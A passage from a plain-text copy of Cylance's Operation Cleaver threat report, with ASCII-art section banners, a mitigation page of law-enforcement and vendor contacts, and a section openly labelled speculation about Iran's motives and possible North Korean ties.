  2531. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  2532. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  2533. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  2534. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  2535. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  2536. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  2537. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  2538. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  2539. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  2540. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  2541. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  2542. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  2543. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  2544. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  2545. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  2546. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  2547. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  2548. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  2549. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  2550. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  2551. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  2552. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  2553. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  2554. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  2555. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  2556. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  2557. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  2558. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  2559. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  2560. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  2561. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  2562. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  2563. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  2564. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  2565. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  2566. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  2567. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  2568. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  2569. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  2570.  
  2571. [ PG-60 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2572.  
  2573.  
  2574.  
  2575. [CYLANCE                                                                                  #OPCLEAVER]
  2576.  
  2577.  
  2578. MITIGATION
  2579.  
  2580. If after reviewing the Indicators of Compromise (IOC) listed in Appendix A, you believe your
  2581. organization to be a victim of Operation Cleaver, we recommend you consider the following course
  2582. of action:
  2583.  
  2584. 1.      If inside the United States, contact the Federal Bureau of Investigation (FBI)
  2585. via either your local FBI team or FBI CYWATCH at 1-855-292-3937 or cywatch@ic.fbi.gov.
  2586.  
  2587. 2.      If outside the United States, contact your local, district, state or federal law
  2588. enforcement authorities.
  2589.  
  2590. 3.      If you have visibility into the attacks on your company and the tools and expertise to track
  2591. them down, leverage the IOCs in Appendix A to identify their presence in your network, prevent them
  2592. from expanding the scope of the compromise, and remove their access immediately.
  2593.  
  2594. 4.      If you do NOT have visibility into the attacks, need help identifying an existing successful
  2595. compromise in your organization, or more importantly wish to prevent this attack or attacks similar
  2596. to Operation Cleaver, please contact your security provider.
  2597.  
  2598. 5.      If you wish to contact Cylance for additional details not available in this report, please email
  2599. opcleaver@cylance.com.
  2600.  
  2601.  
  2602. 6.      If you would like to learn more about Cylance products and professional services, or discuss
  2603. how Cylance can mitigate Operation Cleaver’s impact to your organization, please contact us directly.
  2604.  
  2605.  
  2606.  
  2607. +1 (877) 973 - 3336
  2608.  
  2609.  
  2610. opcleaver@cylance.com
  2611.  
  2612.  
  2613. www.cylance.com
  2614.  
  2615.  
  2616. [ PG-61 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2617.  
  2618.  
  2619.  
  2620. [CYLANCE                                                                                  #OPCLEAVER]
  2621.  
  2622. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  2623. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  2624. %#%%%%%%%%@@@%%%@@#%%%%%%%%            SPECULATION           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
  2625. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  2626. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  2627. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  2628. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  2629. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  2630. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  2631. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  2632. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  2633. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  2634. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  2635. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  2636. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  2637. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  2638. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  2639. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  2640. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  2641. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  2642. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  2643. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  2644. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  2645. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  2646. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  2647. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  2648. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  2649. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  2650. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  2651. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  2652. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  2653. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  2654. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  2655. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  2656. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  2657. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  2658. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  2659. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  2660. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  2661. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  2662. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  2663. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  2664. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  2665. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  2666. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  2667. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  2668. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  2669. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  2670. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  2671. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  2672. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  2673. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  2674. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  2675. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  2676. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  2677. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  2678. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  2679. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  2680. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  2681. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  2682. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  2683.  
  2684. [ PG-62 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2685.  
  2686.  
  2687.  
  2688. [CYLANCE                                                                                  #OPCLEAVER]
  2689.  
  2690.  
  2691. SPECULATION: THE WHY
  2692.  
  2693. Iran in 2014 can probably be best described as galvanizing. They have long been an “enemy” of  
  2694. the west, and the United States in particular, but today’s headlines include a variety of topics
  2695. from nuclear talks to human rights to terrorism to cyber hacking. Iran continues to be extremely
  2696. active on the global stage – and thereby on the radar of every superpower.10
  2697.  
  2698. Iran’s cyber sophistication has grown rapidly since the dawn of Stuxnet and they have used hard
  2699. dollars combined with national pride to help build their cyber army. Few doubt their commitment as
  2700. a government and nation state to funding and recruiting cyber warriors to infiltrate and damage their
  2701. enemies. And it has been commonly postulated that almost all activity since 2010 coming out of Iran
  2702. is associated with retaliation for Stuxnet/Duqu/Flame, which seems natural given the severity of the
  2703. impact. But they don’t need Stuxnet as motivation to want to hack the world. They have long desired
  2704. power on the political stage, in particular in the fight for nuclear power autonomy.
  2705.  
  2706. With the deadlines around the Iranian nuclear discussions pushed to 2015, the attacks may be tied to
  2707. negotiating power when discussing a pact with the nuclear superpowers of United States, Britain,
  2708. France, Germany, Russia and China.
  2709.  
  2710. The inner workings of the Iranian government remain largely a mystery to the western world. However,
  2711. Iran’s control over its people and the private businesses birthed inside has been well reported.
  2712. In a 2014 Reuters article, the reporters detail how the secret Iranian organization called
  2713. “Setad Ejraiye Farmane Hazrate Emam” has become one of the most powerful organizations in the country,
  2714. capable of taking over properties and businesses, buying controlling interests in numerous sectors
  2715. including finance, oil, telecommunications and many others totaling in upwards of $95B.11 Even the US
  2716. Treasury has documented an extensive fronting of companies in its report of Execution of Imam
  2717. Khomeini’s Order (EIKO), which through its two main subsidiaries controls 37 private businesses that
  2718. are purely front companies for the Iranian government.12
  2719.  
  2720. The history of Iran controlling the usage of the Internet and the very Internet on-ramps into Iran is
  2721. well known13, 14. They have controlled much of the country’s Internet access to date and have taken
  2722. over controlling interests in those companies to carry out their work. Given Operation Cleaver’s
  2723. frequent spin-up and take-down of large IP blocks inside the AFRANET IP space inside Iran,
  2724. and Iran’s well recorded investment in cyber warfare14 leads us to one simple conclusion: Iran is
  2725. extremely active in the world of hacking.
  2726.  
  2727. [ PG-63 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2728.  
  2729.  
  2730.  
  2731. [CYLANCE                                                                                  #OPCLEAVER]
  2732.  
  2733.  
  2734. Speculation: The Why (cont.)
  2735.  
  2736. Involvement with North Korea
  2737.  
  2738. Operation Cleaver’s intense focus on critical infrastructure companies, especially in South Korea,
  2739. hints at information sharing or joint operations with Iran’s partner, North Korea. In September, 2012,
  2740. Iran signed an extensive agreement for technology cooperation agreement with North Korea, which allows
  2741. for collaboration on a variety of efforts including IT and security.6
  2742.  
  2743. Cyber Moving to Physical
  2744.  
  2745. Operation Cleaver’s carefully selected targets like the oil and gas industry, energy and utility
  2746. companies, as well as airlines and airports, indicates Iran’s desire to gain deep access into the
  2747. world’s most critical environments. The end goal of this operation is not known at this time.
  2748.  
  2749. University Recruitment
  2750.  
  2751. University student recruitment was hinted at within Operation Cleaver and is consistent with Iran’s
  2752. reported history of active warrior recruitment in the educational space.15
  2753.  
  2754. Overall, there are many reasons that Iran may be pursuing the targets they did in Operation Cleaver.
  2755. While we may never truly know, it is important to consider all the above and more when trying to
  2756. understand the why.
  2757.  
  2758. [ PG-64 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2759.  
  2760.  
  2761.  
  2762. [CYLANCE                                                                                  #OPCLEAVER]
  2763.  
  2764. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  2765. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  2766. %#%%%%%%%%@@@%%%@@#%%%%%%%%            CONCLUSION           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
  2767. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  2768. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  2769. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  2770. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  2771. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  2772. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  2773. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  2774. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  2775. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  2776. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  2777. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  2778. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  2779. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  2780. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  2781. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  2782. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  2783. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  2784. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  2785. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  2786. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  2787. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  2788. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  2789. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  2790. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  2791. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  2792. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  2793. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  2794. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  2795. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  2796. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  2797. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  2798. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  2799. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  2800. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  2801. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  2802. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  2803. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  2804. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  2805. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  2806. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  2807. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  2808. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  2809. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  2810. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  2811. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  2812. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  2813. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
